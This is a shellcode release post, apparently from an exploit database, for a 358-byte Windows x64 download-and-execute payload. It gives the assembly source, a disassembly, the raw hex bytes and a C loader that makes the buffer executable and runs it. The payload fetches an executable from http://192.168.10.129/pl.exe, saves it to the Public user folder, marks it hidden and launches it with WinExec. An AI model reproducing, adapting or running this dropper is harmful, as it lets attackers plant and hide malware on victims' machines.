###########################

# Windows x64 Download & Execute Shellcode (358 bytes)

###########################

/*
 
    # Title : Windows x64 Download+Execute Shellcode
    # Author : Roziul Hasan Khan Shifat
    # Date : 24-11-2016
    # size : 358 bytes
    # Tested on : Windows 7 x64 Professional
    # Email : shifath12@gmail.com  
 
 
 
 
*/
 
 
 
 
/*
 
 
section .text
    global _start
_start:
 
 
;-----------------------------
 
sub rsp,88
 
lea r14,[rsp]
sub rsp,88
 
 
;------------------------------------------------
 
 
xor rdx,rdx
mov rax,[gs:rdx+0x60] ;PEB
mov rsi,[rax+0x18] ;PEB.Ldr
mov rsi,[rsi+0x10] ;PEB.Ldr->InMemOrderModuleList
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30] ;kernel32.dll base address
 
;---------------------------------------------------
 
 
mov ebx,[rdi+0x3c] ;elf_anew
add rbx,rdi
mov dl,0x88
mov ebx,[rbx+rdx]
add rbx,rdi
 
mov esi,[rbx+0x1c]
add rsi,rdi
;--------------------------------------------------
 
;loading urlmon.dll
 
mov dx,831
mov ebx,[rsi+rdx*4]
add rbx,rdi
 
xor rdx,rdx
 
 
mov [r14],dword 'urlm'
mov [r14+4],word 'on'
mov [r14+6],byte dl
 
lea rcx,[r14]
 
 
 
call rbx
 
 
mov dx,586
mov ebx,[rsi+rdx*4]
add rbx,rdi
 
xor rdx,rdx
 
mov rcx,'URLDownl'
mov [r14],rcx
mov rcx,'oadToFil'
mov [r14+8],rcx
mov [r14+16],word 'eA'
mov [r14+18],byte dl
 
 
lea rdx,[r14]
mov rcx,rax
 
call rbx
;;;;;;;;;;;;;;;;;;;;;;-------------------------------------
 
mov r15,rax
 
;------------------------------------------------
;save as 'C:\\Users\\Public\\p.exe' length: 24+1
 
mov rax,'C:\\User'
mov [r14],rax
mov rax,'s\\Publi'
mov [r14+8],rax
mov rax,'c\\p.exe'
mov [r14+16],rax
 
xor rdx,rdx
mov [r14+24],byte dl
 
 
;----------------------------------------
 
 
lea rcx,[r14+25]
 
 
;url "http://192.168.10.129/pl.exe" length: 28+1
 
mov rax,'http://1'
mov [rcx],rax
mov rax,'92.168.1'
mov [rcx+8],rax
mov rax,'0.129/pl'
mov [rcx+16],rax
mov [rcx+24],dword '.exe'
mov [rcx+28],byte dl
 
 
;---------------------------------------------------
 
sub rsp,88
 
 
download:
xor rcx,rcx
lea rdx,[r14+25]
lea r8,[r14]
xor r9,r9
mov [rsp+32],r9
 
call r15
 
xor rdx,rdx
cmp rax,rdx
jnz download
 
 
 
;------------------------------------------------
sub rsp,88
;-----------------------------------------------
;hiding file
 
 
 
 
mov dx,1131
mov ebx,[rsi+rdx*4]
add rbx,rdi ;SetFileAttributesA()
 
 
lea rcx,[r14]
xor rdx,rdx
mov dl,2
 
call rbx
 
;------------------------------------
;executing file
xor rdx,rdx
mov dx,1314
mov ebx,[rsi+rdx*4]
add rbx,rdi ;WinExec()
 
 
lea rcx,[r14]
 
xor rdx,rdx
 
 
 
call rbx
 
 
;------------------------------
xor rdx,rdx
mov dx,296
mov ebx,[rsi+rdx*4]
add rbx,rdi
 
;---------------------------------------
 
;if U use this shellcode for pe injection, then don't forget to free allocated space
 
add rsp,88
xor rcx,rcx
call rbx
 
 
*/
 
/*
 
 
Disassembly of section .text:
 
0000000000000000 <_start>:
   0:   48 83 ec 58             sub    $0x58,%rsp
   4:   4c 8d 34 24             lea    (%rsp),%r14
   8:   48 83 ec 58             sub    $0x58,%rsp
   c:   48 31 d2                xor    %rdx,%rdx
   f:   65 48 8b 42 60          mov    %gs:0x60(%rdx),%rax
  14:   48 8b 70 18             mov    0x18(%rax),%rsi
  18:   48 8b 76 10             mov    0x10(%rsi),%rsi
  1c:   48 ad                   lods   %ds:(%rsi),%rax
  1e:   48 8b 30                mov    (%rax),%rsi
  21:   48 8b 7e 30             mov    0x30(%rsi),%rdi
  25:   8b 5f 3c                mov    0x3c(%rdi),%ebx
  28:   48 01 fb                add    %rdi,%rbx
  2b:   b2 88                   mov    $0x88,%dl
  2d:   8b 1c 13                mov    (%rbx,%rdx,1),%ebx
  30:   48 01 fb                add    %rdi,%rbx
  33:   8b 73 1c                mov    0x1c(%rbx),%esi
  36:   48 01 fe                add    %rdi,%rsi
  39:   66 ba 3f 03             mov    $0x33f,%dx
  3d:   8b 1c 96                mov    (%rsi,%rdx,4),%ebx
  40:   48 01 fb                add    %rdi,%rbx
  43:   48 31 d2                xor    %rdx,%rdx
  46:   41 c7 06 75 72 6c 6d    movl   $0x6d6c7275,(%r14)
  4d:   66 41 c7 46 04 6f 6e    movw   $0x6e6f,0x4(%r14)
  54:   41 88 56 06             mov    %dl,0x6(%r14)
  58:   49 8d 0e                lea    (%r14),%rcx
  5b:   ff d3                   callq  *%rbx
  5d:   66 ba 4a 02             mov    $0x24a,%dx
  61:   8b 1c 96                mov    (%rsi,%rdx,4),%ebx
  64:   48 01 fb                add    %rdi,%rbx
  67:   48 31 d2                xor    %rdx,%rdx
  6a:   48 b9 55 52 4c 44 6f    movabs $0x6c6e776f444c5255,%rcx
  71:   77 6e 6c 
  74:   49 89 0e                mov    %rcx,(%r14)
  77:   48 b9 6f 61 64 54 6f    movabs $0x6c69466f5464616f,%rcx
  7e:   46 69 6c 
  81:   49 89 4e 08             mov    %rcx,0x8(%r14)
  85:   66 41 c7 46 10 65 41    movw   $0x4165,0x10(%r14)
  8c:   41 88 56 12             mov    %dl,0x12(%r14)
  90:   49 8d 16                lea    (%r14),%rdx
  93:   48 89 c1                mov    %rax,%rcx
  96:   ff d3                   callq  *%rbx
  98:   49 89 c7                mov    %rax,%r15
  9b:   48 b8 43 3a 5c 5c 55    movabs $0x726573555c5c3a43,%rax
  a2:   73 65 72 
  a5:   49 89 06                mov    %rax,(%r14)
  a8:   48 b8 73 5c 5c 50 75    movabs $0x696c6275505c5c73,%rax
  af:   62 6c 69 
  b2:   49 89 46 08             mov    %rax,0x8(%r14)
  b6:   48 b8 63 5c 5c 70 2e    movabs $0x6578652e705c5c63,%rax
  bd:   65 78 65 
  c0:   49 89 46 10             mov    %rax,0x10(%r14)
  c4:   48 31 d2                xor    %rdx,%rdx
  c7:   41 88 56 18             mov    %dl,0x18(%r14)
  cb:   49 8d 4e 19             lea    0x19(%r14),%rcx
  cf:   48 b8 68 74 74 70 3a    movabs $0x312f2f3a70747468,%rax
  d6:   2f 2f 31 
  d9:   48 89 01                mov    %rax,(%rcx)
  dc:   48 b8 39 32 2e 31 36    movabs $0x312e3836312e3239,%rax
  e3:   38 2e 31 
  e6:   48 89 41 08             mov    %rax,0x8(%rcx)
  ea:   48 b8 30 2e 31 32 39    movabs $0x6c702f3932312e30,%rax
  f1:   2f 70 6c 
  f4:   48 89 41 10             mov    %rax,0x10(%rcx)
  f8:   c7 41 18 2e 65 78 65    movl   $0x6578652e,0x18(%rcx)
  ff:   88 51 1c                mov    %dl,0x1c(%rcx)
 102:   48 83 ec 58             sub    $0x58,%rsp
 
0000000000000106 <download>:
 106:   48 31 c9                xor    %rcx,%rcx
 109:   49 8d 56 19             lea    0x19(%r14),%rdx
 10d:   4d 8d 06                lea    (%r14),%r8
 110:   4d 31 c9                xor    %r9,%r9
 113:   4c 89 4c 24 20          mov    %r9,0x20(%rsp)
 118:   41 ff d7                callq  *%r15
 11b:   48 31 d2                xor    %rdx,%rdx
 11e:   48 39 d0                cmp    %rdx,%rax
 121:   75 e3                   jne    106 <download>
 123:   48 83 ec 58             sub    $0x58,%rsp
 127:   66 ba 6b 04             mov    $0x46b,%dx
 12b:   8b 1c 96                mov    (%rsi,%rdx,4),%ebx
 12e:   48 01 fb                add    %rdi,%rbx
 131:   49 8d 0e                lea    (%r14),%rcx
 134:   48 31 d2                xor    %rdx,%rdx
 137:   b2 02                   mov    $0x2,%dl
 139:   ff d3                   callq  *%rbx
 13b:   48 31 d2                xor    %rdx,%rdx
 13e:   66 ba 22 05             mov    $0x522,%dx
 142:   8b 1c 96                mov    (%rsi,%rdx,4),%ebx
 145:   48 01 fb                add    %rdi,%rbx
 148:   49 8d 0e                lea    (%r14),%rcx
 14b:   48 31 d2                xor    %rdx,%rdx
 14e:   ff d3                   callq  *%rbx
 150:   48 31 d2                xor    %rdx,%rdx
 153:   66 ba 28 01             mov    $0x128,%dx
 157:   8b 1c 96                mov    (%rsi,%rdx,4),%ebx
 15a:   48 01 fb                add    %rdi,%rbx
 15d:   48 83 c4 58             add    $0x58,%rsp
 161:   48 31 c9                xor    %rcx,%rcx
 164:   ff d3                   callq  *%rbx
 
*/
 
#include<windows.h>
#include<stdio.h>
#include<string.h>
 
 
char shellcode[]=\
 
"\x48\x83\xec\x58\x4c\x8d\x34\x24\x48\x83\xec\x58\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x66\xba\x3f\x03\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x41\xc7\x06\x75\x72\x6c\x6d\x66\x41\xc7\x46\x04\x6f\x6e\x41\x88\x56\x06\x49\x8d\x0e\xff\xd3\x66\xba\x4a\x02\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x48\xb9\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x49\x89\x0e\x48\xb9\x6f\x61\x64\x54\x6f\x46\x69\x6c\x49\x89\x4e\x08\x66\x41\xc7\x46\x10\x65\x41\x41\x88\x56\x12\x49\x8d\x16\x48\x89\xc1\xff\xd3\x49\x89\xc7\x48\xb8\x43\x3a\x5c\x5c\x55\x73\x65\x72\x49\x89\x06\x48\xb8\x73\x5c\x5c\x50\x75\x62\x6c\x69\x49\x89\x46\x08\x48\xb8\x63\x5c\x5c\x70\x2e\x65\x78\x65\x49\x89\x46\x10\x48\x31\xd2\x41\x88\x56\x18\x49\x8d\x4e\x19\x48\xb8\x68\x74\x74\x70\x3a\x2f\x2f\x31\x48\x89\x01\x48\xb8\x39\x32\x2e\x31\x36\x38\x2e\x31\x48\x89\x41\x08\x48\xb8\x30\x2e\x31\x32\x39\x2f\x70\x6c\x48\x89\x41\x10\xc7\x41\x18\x2e\x65\x78\x65\x88\x51\x1c\x48\x83\xec\x58\x48\x31\xc9\x49\x8d\x56\x19\x4d\x8d\x06\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x41\xff\xd7\x48\x31\xd2\x48\x39\xd0\x75\xe3\x48\x83\xec\x58\x66\xba\x6b\x04\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xb2\x02\xff\xd3\x48\x31\xd2\x66\xba\x22\x05\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xff\xd3\x48\x31\xd2\x66\xba\x28\x01\x8b\x1c\x96\x48\x01\xfb\x48\x83\xc4\x58\x48\x31\xc9\xff\xd3";
 
int main()
{
int len=strlen(shellcode);
DWORD l=0;
printf("shellcode length : %d\n",len);
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
(* (int(*)()) shellcode)();
 
return 0;
 
}

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-11-25]

###########################